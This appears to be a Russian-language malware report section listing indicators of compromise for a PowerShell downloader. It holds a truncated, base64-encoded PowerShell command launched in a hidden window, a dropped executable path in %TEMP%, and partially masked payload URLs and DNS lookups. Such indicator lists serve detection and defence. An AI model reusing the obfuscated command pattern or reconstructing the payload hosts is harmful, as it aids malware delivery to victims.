Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHIAcgAyADIAMwBrAD0AKAAnAEIAJwArACcANAAwADgAbAAnACsAJwBuADkAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBwAFwAbwBGAGYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\pz6kc0.exe
- %TEMP%\office2019\pz6kc0.exe
- http://ca####shuasca.com/sys-cache/qkmAGt/
- http://ca###l.adv.br/css/wsF/
- http://www.du###low.com/wp-content/yvu1atyip7814/
- http://www.em##shop.sk/sitemap/f00nsf09254466/
- http://fl###ergast.dk/blogs/jdu6dq57246773/
- DNS ASK ca####shuasca.com
- DNS ASK se####eforlongi.com
- DNS ASK br###tmega.com
- DNS ASK ca###l.adv.br
- DNS ASK du###low.com
- DNS ASK em##shop.sk
- DNS ASK fl###ergast.dk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHIAcgAyADIAMwBrAD0AKAAnAEIAJwArACcANAAwADgAbAAnACsAJwBuADkAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBwAFwAbwBGAGYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)